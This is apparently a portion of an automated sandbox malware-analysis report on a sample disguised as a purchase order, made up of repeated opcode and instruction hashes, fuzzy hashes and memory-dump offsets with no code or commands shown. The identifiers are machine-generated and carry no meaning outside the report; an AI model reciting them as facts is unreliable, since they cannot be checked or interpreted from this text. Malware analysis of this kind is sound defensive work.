                                              • Opcode ID: 7009d11f87c45bb0a3dc2eecdd4117f894dc2e0b1a39540252a054b356951bb9
                                              • Instruction ID: 1c072ed0ae39a289e7d818c15a67c2bb0c85a381ea66c02279695f4b33cc5778
                                              • Opcode Fuzzy Hash: 7009d11f87c45bb0a3dc2eecdd4117f894dc2e0b1a39540252a054b356951bb9
                                              • Instruction Fuzzy Hash: 96F05E353106009FC714DB29D459E2A7BAAFFC8721B1040A9FA468B3A0CE32EC42CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e4f5b385f0eafa7de530d6a6e931b87fb7da251efcee2c41f229bb4cf6ef152b
                                              • Instruction ID: 2df83245c553f38633886a18a15031a680b26a237526dc3b771039fa9b63d55b
                                              • Opcode Fuzzy Hash: e4f5b385f0eafa7de530d6a6e931b87fb7da251efcee2c41f229bb4cf6ef152b
                                              • Instruction Fuzzy Hash: 1901A578A052299FCB64EF64D9449D9BBF1FB89340F1080D9E409A7B44DB345F85CF51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4725299066ba40bd86cf031b68570cbee758357747960106bc5c22d25e8e885d
                                              • Instruction ID: 315ab321bcdf0ce1e29598a7d64babc4567c2b2247e1ae088aaf217ea73fb26c
                                              • Opcode Fuzzy Hash: 4725299066ba40bd86cf031b68570cbee758357747960106bc5c22d25e8e885d
                                              • Instruction Fuzzy Hash: 21F0E2B5C15209EFDB48DFA8D9486AEBBF8FF09301F2048A99419B7390D7305A41CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0138c65e0e03e48b3e53975bc1b722861aac87dfa15658c48cf330a0e336d9eb
                                              • Instruction ID: 0028dc58e3aece23e629e31c5796e933241ca981433a111a1e55946b71939a71
                                              • Opcode Fuzzy Hash: 0138c65e0e03e48b3e53975bc1b722861aac87dfa15658c48cf330a0e336d9eb
                                              • Instruction Fuzzy Hash: 5DF01D71D08248AFCB44CFA9D450BADBFF5EB49210F14C49AE828D6250C2358A51DF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c9a5e8de1699e8cf43504c0e864abf43dd273785622bd0f22d8c2a379b9ae1e
                                              • Instruction ID: 986e4dfff2cd76d3cc27182c51604bf507c5912d918ea2f2b41cb4a9d6b90d33
                                              • Opcode Fuzzy Hash: 6c9a5e8de1699e8cf43504c0e864abf43dd273785622bd0f22d8c2a379b9ae1e
                                              • Instruction Fuzzy Hash: B601E874906299CBDF10DF68D88C799B7B2BB05304F1045D5D409AB285D7785A91CF42
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b58fef5739e5d49a49b2b53784e3ee0a2cb596456f5778e1471b3b997c4a9fe6
                                              • Instruction ID: b9b2ca79f471a2778790b8a3de175c6980fc054e1721549f081db1881890515c
                                              • Opcode Fuzzy Hash: b58fef5739e5d49a49b2b53784e3ee0a2cb596456f5778e1471b3b997c4a9fe6
                                              • Instruction Fuzzy Hash: F5F01C3A3006118F87049F59D884D9A7BE9BF8962131184AEF50ACB320CA71DC09CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 242b9c53654e18e565a4bbc79cf391fa1b4fc5e44a2c365217f99382e610286e
                                              • Instruction ID: 1b433fa21493acef531ab76331f810f46dd64f863d2f30442af0445320eaa2a4
                                              • Opcode Fuzzy Hash: 242b9c53654e18e565a4bbc79cf391fa1b4fc5e44a2c365217f99382e610286e
                                              • Instruction Fuzzy Hash: 55E0E574E04208EFCB84DFA9D4446ACFBF4EB49200F20C4EDC819A3351D6319A41DF84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c30162dd38f362ed69d8ad2485301d7ec9cbe8ba17549be8e0b8c7450e502531
                                              • Instruction ID: f0c6214bd5e2b53b805a0c9414e557f7b266592f86b258b728abf2eec1575842
                                              • Opcode Fuzzy Hash: c30162dd38f362ed69d8ad2485301d7ec9cbe8ba17549be8e0b8c7450e502531
                                              • Instruction Fuzzy Hash: A1E0E574E04208EFCB84DFA9D4456ACFBF4EB49214F21C4E98828A3341D731AA42CF80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c30162dd38f362ed69d8ad2485301d7ec9cbe8ba17549be8e0b8c7450e502531
                                              • Instruction ID: a614561c9134c9430baf93dc69c880d0e0d767146db563c304e02ab6b312c50e
                                              • Opcode Fuzzy Hash: c30162dd38f362ed69d8ad2485301d7ec9cbe8ba17549be8e0b8c7450e502531
                                              • Instruction Fuzzy Hash: 56E0C274E04208EFCB84DFA9D4406ACFBF5EB49200F20C4AA9828A3340D6319A42CF80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e73550fe32e01cd516aae1e79c9436c4735317846bcbb9f9410840b1432bd2d0
                                              • Instruction ID: cd094128b60c70abca03ccd0bcb4800ba6102768c46273a6821d4c2e76ef679c
                                              • Opcode Fuzzy Hash: e73550fe32e01cd516aae1e79c9436c4735317846bcbb9f9410840b1432bd2d0
                                              • Instruction Fuzzy Hash: C5E0E574D08208AFCB08DF95D544AACFBB9EB49210F24C4AA985567391D6319A91EF84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 603f2a2f9ae0db31a0baa231bd35864336d164ca23853ffc8468db3a56b2c616
                                              • Instruction ID: 5833516f2832f7a2e92bd9982bfbbe2976eb4111a3b9f75f2a52979eb518b825
                                              • Opcode Fuzzy Hash: 603f2a2f9ae0db31a0baa231bd35864336d164ca23853ffc8468db3a56b2c616
                                              • Instruction Fuzzy Hash: 4AE01A74E04308EFCF48DFA9D4046ACBBB9BB49300F2084EA8818A3300D7345A40DF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 194d311227e845ec9325a75a1d09af11190914a7c40e09ff7d1d31979d0e5c69
                                              • Instruction ID: 6928abd0477221cc37c5a64bc7337e9ba472685cc4e23ddced95b3e061b615d8
                                              • Opcode Fuzzy Hash: 194d311227e845ec9325a75a1d09af11190914a7c40e09ff7d1d31979d0e5c69
                                              • Instruction Fuzzy Hash: E0E04FB5D08308EFC744DBA4D84496DFFB8AB46311F20C499DC5567341C631AA51DB94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 71a500bc455283664a385edd1ab664e39fd1ad0b844dc855c89ee90986bb19a6
                                              • Instruction ID: 53b861be4741a38d4042df912272ba2c70efbb874df9d7a131d33cd066481263
                                              • Opcode Fuzzy Hash: 71a500bc455283664a385edd1ab664e39fd1ad0b844dc855c89ee90986bb19a6
                                              • Instruction Fuzzy Hash: CEE08C74D08208EBCB08DFA5E8459ACFBB9EB46310F24C4A9DC0627350C6329E92DB84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03e7d29380d32abbe30d708b995222fe6b2e068bc5c0edf000edd8e545064aa1
                                              • Instruction ID: b038c1ed992452a8449512a8f4b6ebdeff43d7c73308647f5c2c2f6a2dfdb2b2
                                              • Opcode Fuzzy Hash: 03e7d29380d32abbe30d708b995222fe6b2e068bc5c0edf000edd8e545064aa1
                                              • Instruction Fuzzy Hash: D9E04F70A01209DFCB54DFB8E8456AC77B6EB8521576061F9D489D3750EF325E81CB01
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c49577c91cab350bc3bc0ebdddda1aa45d59f90784345c8129ce2b1c519125cd
                                              • Instruction ID: b4c08bd3e65197b3896be1d7bb25abd8c3f10b565859e6ab4464a0991a9b5d90
                                              • Opcode Fuzzy Hash: c49577c91cab350bc3bc0ebdddda1aa45d59f90784345c8129ce2b1c519125cd
                                              • Instruction Fuzzy Hash: 34E02B35745310CFDB28A660AD41B613B626B48352F185DEEDA059F1C0D6B1E841C302
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9a0c3ab15bfc82e2a003076b125bb191ff0552f3779b533aaebded7923e99deb
                                              • Instruction ID: d5a1212fa327115919b0a2e751f321d50ee8d18afab41bcf08f80b52ae9277a1
                                              • Opcode Fuzzy Hash: 9a0c3ab15bfc82e2a003076b125bb191ff0552f3779b533aaebded7923e99deb
                                              • Instruction Fuzzy Hash: 44E04FB5E102089BDB04EBF4EE517AD77B1EB88210F1047A9D41597280FA316F029B50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06c4b8aa102be8bcc5ee468f27a4946dcca90a51212745362ce0830a5bdad703
                                              • Instruction ID: 8837ee0ad0e65d4f386b7eb04131534747ccaed531d4404eec17fbbca6042269
                                              • Opcode Fuzzy Hash: 06c4b8aa102be8bcc5ee468f27a4946dcca90a51212745362ce0830a5bdad703
                                              • Instruction Fuzzy Hash: 5DE0DF71E02208DFCB40EBB4EA1579D7BF1EF44321F100BD9C00A93380E9306E048B82
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2449ec7037c7c826362bae841896e2e1a31990edbd5d2043bd7e524117dbfafc
                                              • Instruction ID: a887a0da8b755ee882b9e4f9e6ad82899c0189fc6ebeb8cb260ffdc97ec3a46d
                                              • Opcode Fuzzy Hash: 2449ec7037c7c826362bae841896e2e1a31990edbd5d2043bd7e524117dbfafc
                                              • Instruction Fuzzy Hash: 32E04F34D04208DFC784EFA8D44069CFBF8AB09200F2084E98C18D3340E7319E42CF80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f33cb706dd73c7764fb0fd6e55450429e224790583383570d97bdb2179b1e908
                                              • Instruction ID: 6d327c8253dd37a5c14223a52593eab511bb4da25c49ebe853b8cf5ca8897910
                                              • Opcode Fuzzy Hash: f33cb706dd73c7764fb0fd6e55450429e224790583383570d97bdb2179b1e908
                                              • Instruction Fuzzy Hash: 3FE02234404196CFC365DBA0D855BD5BBB0EF4E309F5941D6C0296B682DB30AA88CFA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 370339da12430e0faa778726a98ec762319cf11a418b53b5ee33f34d5a143f7c
                                              • Instruction ID: 7cb4aaa09a037b30162572ec3243f427567936eb5ff20793099b526e92b44e04
                                              • Opcode Fuzzy Hash: 370339da12430e0faa778726a98ec762319cf11a418b53b5ee33f34d5a143f7c
                                              • Instruction Fuzzy Hash: EDE01A34D08218EFCB44DB95D4416ACFBB4EB89310F2080E98C6867381D7355A41DF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de34ed9382aa772898ddd750b544ad671c78af03e539d4694536d404d189dedc
                                              • Instruction ID: e2c14190c2d5f958d3ece9be95fa138245aed011caf9e0bac530b6b67c8f68ff
                                              • Opcode Fuzzy Hash: de34ed9382aa772898ddd750b544ad671c78af03e539d4694536d404d189dedc
                                              • Instruction Fuzzy Hash: 23E0EC74D55208DFCB44DFB9D5496ACBFF8AB05211F2045A98809A3250E7705F90CB41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e208671cfabd548221af9d374a765acc990114bf7ede467bdf935cc813696e6
                                              • Instruction ID: 1d632344dc961d08d2147fa98e30e2dd9c470fde7b5ddad02dea52362c4ca1f6
                                              • Opcode Fuzzy Hash: 1e208671cfabd548221af9d374a765acc990114bf7ede467bdf935cc813696e6
                                              • Instruction Fuzzy Hash: 67E0C234909208DBCB08DF95E84996CFBB8FB46300F2094DCC80837341CB315E42CB80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486411765.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e70000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e4e7091140b057e4f02fc8c7257db516ab4bccf31127d495fe18164f72044b35
                                              • Instruction ID: fb929ca7e2a21a877963cf712dbe2d38a2aae418d30aca4690bdee6053dc0653
                                              • Opcode Fuzzy Hash: e4e7091140b057e4f02fc8c7257db516ab4bccf31127d495fe18164f72044b35
                                              • Instruction Fuzzy Hash: CEE08C34949308DBCB04DF94E8459ACBBB9AB46304F2091DCC80827341CB316E42CF81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5919d2a2020fdf3f0bcb26ce7aa9cc81d98549bc26a72fc341d7bc8e4b310496
                                              • Instruction ID: 16855fe1b1f80d9b5d1c512f99388c15144bd51f8687d44d620336a49ec4aaa0
                                              • Opcode Fuzzy Hash: 5919d2a2020fdf3f0bcb26ce7aa9cc81d98549bc26a72fc341d7bc8e4b310496
                                              • Instruction Fuzzy Hash: C5E0C272840308DFDB06EFF5D408B5EB7F8DB46201F1008E99444A3210EB714E109BA6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 252f0e306237b1470d9f09caf03eb2618da5d68fac91657e530cf8763d8119ee
                                              • Instruction ID: 082d75d3e10dd66bd302b281a5a183a11ced98c8b8ee8affa2647eff5b8bc904
                                              • Opcode Fuzzy Hash: 252f0e306237b1470d9f09caf03eb2618da5d68fac91657e530cf8763d8119ee
                                              • Instruction Fuzzy Hash: EEE04F30A01209DFCB54EFB8E44556CB7B5EB452147A051B8D489D3300EF326E80CB41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 68c595a61554c8ddf1d72af0131670bf2f6d543aa2c962bbe61c50dd962856b8
                                              • Instruction ID: 848001256264c4ece87b5b2bfb0e254b2b22c73660d78572349d8f9c7c39542a
                                              • Opcode Fuzzy Hash: 68c595a61554c8ddf1d72af0131670bf2f6d543aa2c962bbe61c50dd962856b8
                                              • Instruction Fuzzy Hash: 92D02B3430439547C725826EE8027A23FD2ABC9A0CF4009ADF405C7714EA10DD4587C0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 29bd10676ca65bac2c5e2b46af69027a788584feda18b2aac31b13576e1df94a
                                              • Instruction ID: 2e952594b54dccc39362d91ef38a52acd89857111986143ec94fd3b5d064396f
                                              • Opcode Fuzzy Hash: 29bd10676ca65bac2c5e2b46af69027a788584feda18b2aac31b13576e1df94a
                                              • Instruction Fuzzy Hash: 8BD097E3C201542BC505FB7A48F9ACCBF00AD320303150FC8A033C10E0DD30A12F800A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6a4d0ad1409556c2db29583bc47366fd73cefb1c680691829d0282eff12a7da9
                                              • Instruction ID: 2dd55192e933abd0ddb91697176e3c940e3f0e8cf17804c88d6725d19c3cf2a8
                                              • Opcode Fuzzy Hash: 6a4d0ad1409556c2db29583bc47366fd73cefb1c680691829d0282eff12a7da9
                                              • Instruction Fuzzy Hash: 83E086B60892C4DFC703C725D8458803F749F1761032D64DBF1448F172E222A958C755
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f60977ace6619d410a3104c6a303ec17443c5df35a3193862dae31156d0f1cba
                                              • Instruction ID: e2712fdb8c826ca67fe02efb93d99df7acee6110475fc3db484bb7dfcba4d0d4
                                              • Opcode Fuzzy Hash: f60977ace6619d410a3104c6a303ec17443c5df35a3193862dae31156d0f1cba
                                              • Instruction Fuzzy Hash: 5EE08C34948308DBCB08DF94E840A6CFFB8AB86300F2080EC8C1867340CB325E42DBC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0382d1189dbffff69f9fa8850e42a63de89b9f188a678f76544cae9038c65aa5
                                              • Instruction ID: ea4ab69d9b0c1af024c5428398d5356893673a616ed390acde904cf6e9f6a0ca
                                              • Opcode Fuzzy Hash: 0382d1189dbffff69f9fa8850e42a63de89b9f188a678f76544cae9038c65aa5
                                              • Instruction Fuzzy Hash: 38F062B4D42228DFCBA4DF55E88869CBBB5FB58311F1082D9940DA3354DB345E90CF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: >$J
                                              • API String ID: 0-3059046560
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0805056b4f71e99a2d1dc0b39550b5f557b935707202417ca3aadb2c21a4ef20
                                              • Instruction ID: dfb9da43a40a81ae7ba23e8f2ddb7b2c5549ac2e0d3180b1ac86ec1a29e4db02
                                              • Opcode Fuzzy Hash: 0805056b4f71e99a2d1dc0b39550b5f557b935707202417ca3aadb2c21a4ef20
                                              • Instruction Fuzzy Hash: 6261FB70E007598FE749EF6AE84069EBBF3BBC9300F14D569C0059B368EB7058568B95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 557cae55efd23d32fccdb7064a02e92add250c8aef60b23e25fe185a36c536c1
                                              • Instruction ID: db20ca31a57ff6793e8df480ae11c077a3d68b582cd979976bc5be769a5a0d53
                                              • Opcode Fuzzy Hash: 557cae55efd23d32fccdb7064a02e92add250c8aef60b23e25fe185a36c536c1
                                              • Instruction Fuzzy Hash: 585107B0D09218DFDB04DFA9D4497EDBBF2FB89304F10A169E48AA7254E7745A85CF04
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486576798.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ee0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b1ccf72e288f24b72aadac86477e359d73c89165d47408e0aa5c521b66256d8
                                              • Instruction ID: cfe0de86512e2acbd086fb368e4d2bbbd9fb374295c4a8e40fd0859ffab44f3c
                                              • Opcode Fuzzy Hash: 1b1ccf72e288f24b72aadac86477e359d73c89165d47408e0aa5c521b66256d8
                                              • Instruction Fuzzy Hash: 06410FB0D10348DFEB10CFA9D985B9EBBF1BB09304F20A02AE855BB250D774A885CF45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486576798.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ee0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8692257d2ef3aedb6c2b94289f3cc6ff370cd6d894b6ede9708fd4acd401acd9
                                              • Instruction ID: c6385da96be6f44731ddfdac48302777a692781860b5878a852bf8abc865eb6e
                                              • Opcode Fuzzy Hash: 8692257d2ef3aedb6c2b94289f3cc6ff370cd6d894b6ede9708fd4acd401acd9
                                              • Instruction Fuzzy Hash: 9F5101B1D056588BE76CCF678D446CAFAF7AFC8340F14C1FA954CA6254EB740AC58E11
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 23978763ea28c5ab6072ec479da0d3a9124dcdef3ec1fbcf80ec6db12a96bf4d
                                              • Instruction ID: e095b58177dcdd0a435fffa144585a15732628917ab61c361a8aac09c918ae2b
                                              • Opcode Fuzzy Hash: 23978763ea28c5ab6072ec479da0d3a9124dcdef3ec1fbcf80ec6db12a96bf4d
